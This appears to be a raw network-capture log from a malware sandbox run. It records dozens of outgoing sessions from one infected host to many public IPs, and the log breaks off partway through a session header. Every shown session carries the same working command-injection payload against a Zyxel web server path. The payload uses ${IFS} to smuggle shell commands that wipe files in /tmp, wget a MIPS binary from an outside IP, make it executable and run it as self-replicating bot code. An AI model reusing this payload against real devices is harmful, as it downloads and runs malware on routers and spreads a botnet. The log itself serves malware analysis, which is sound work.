                                              Jan 29, 2024 07:03:35.723601103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              772192.168.2.1457784180.238.33.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723613024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              773192.168.2.1453932152.171.150.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723633051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              774192.168.2.1456648159.204.93.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723694086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              775192.168.2.1446800201.41.224.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723722935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              776192.168.2.1439078120.179.108.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723759890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              777192.168.2.1440382202.194.134.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723802090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              778192.168.2.144418284.71.137.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723845005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              779192.168.2.1435304217.99.42.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723860979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              780192.168.2.1454196150.219.196.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723893881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              781192.168.2.1444692216.208.132.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723942995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              782192.168.2.1441868144.177.237.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.723959923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              783192.168.2.1458958151.227.234.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724014044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              784192.168.2.1440990169.88.51.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724057913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              785192.168.2.1445696115.100.168.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724098921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              786192.168.2.145959272.156.179.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724129915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              787192.168.2.145931839.196.29.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724157095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              788192.168.2.1459146191.117.177.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724199057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              789192.168.2.145177843.214.78.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724220991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              790192.168.2.1440416138.252.215.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724252939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              791192.168.2.1446574108.118.239.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724281073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              792192.168.2.143724246.232.99.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724315882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              793192.168.2.1458292115.153.37.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724366903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              794192.168.2.145949832.145.123.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724401951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              795192.168.2.1454580147.229.185.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724417925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              796192.168.2.145080496.64.42.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724482059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              797192.168.2.1449528198.39.21.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724489927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              798192.168.2.145950890.237.171.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724524021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              799192.168.2.1448204164.171.5.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724584103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              800192.168.2.1447844165.119.7.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724605083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              801192.168.2.143282679.44.117.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724643946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              802192.168.2.1445552105.223.183.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724704027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              803192.168.2.143277857.94.39.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724734068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              804192.168.2.14499148.14.179.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724765062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              805192.168.2.1455042176.48.106.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724797964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              806192.168.2.1448326189.234.47.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724853039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              807192.168.2.1439542176.92.149.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724884033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              808192.168.2.1444874198.54.247.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724930048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              809192.168.2.1440186112.153.230.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.724960089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              810192.168.2.1444036209.92.92.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725006104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              811192.168.2.1460440136.238.83.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725035906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              812192.168.2.143277281.232.127.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725085020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              813192.168.2.1445992211.0.108.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725106001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              814192.168.2.145788034.75.163.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725145102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              815192.168.2.1452840187.19.35.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725186110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              816192.168.2.1450014169.4.52.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725209951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              817192.168.2.1440736222.139.71.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725250006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              818192.168.2.1442186197.8.116.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725282907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              819192.168.2.144882460.7.36.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725317001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              820192.168.2.1458878197.224.170.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725348949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              821192.168.2.1449648197.11.71.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725404024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              822192.168.2.1444446188.179.87.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725429058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              823192.168.2.1446526197.6.141.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725461006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              824192.168.2.1435714108.78.242.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725518942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              825192.168.2.144496661.72.52.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725539923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              826192.168.2.145167275.52.42.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725579977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              827192.168.2.1439330194.46.42.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725662947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              828192.168.2.1456670125.185.103.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725701094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              829192.168.2.1438964189.191.55.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725723982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              830192.168.2.1448952124.82.67.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725771904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              831192.168.2.145400436.44.244.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725801945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              832192.168.2.1439266176.190.76.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725831985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              833192.168.2.145129066.108.126.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725874901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              834192.168.2.1439102204.202.141.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725903034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              835192.168.2.1453110100.180.34.229443
                                              TimestampBytes transferredDirectionData
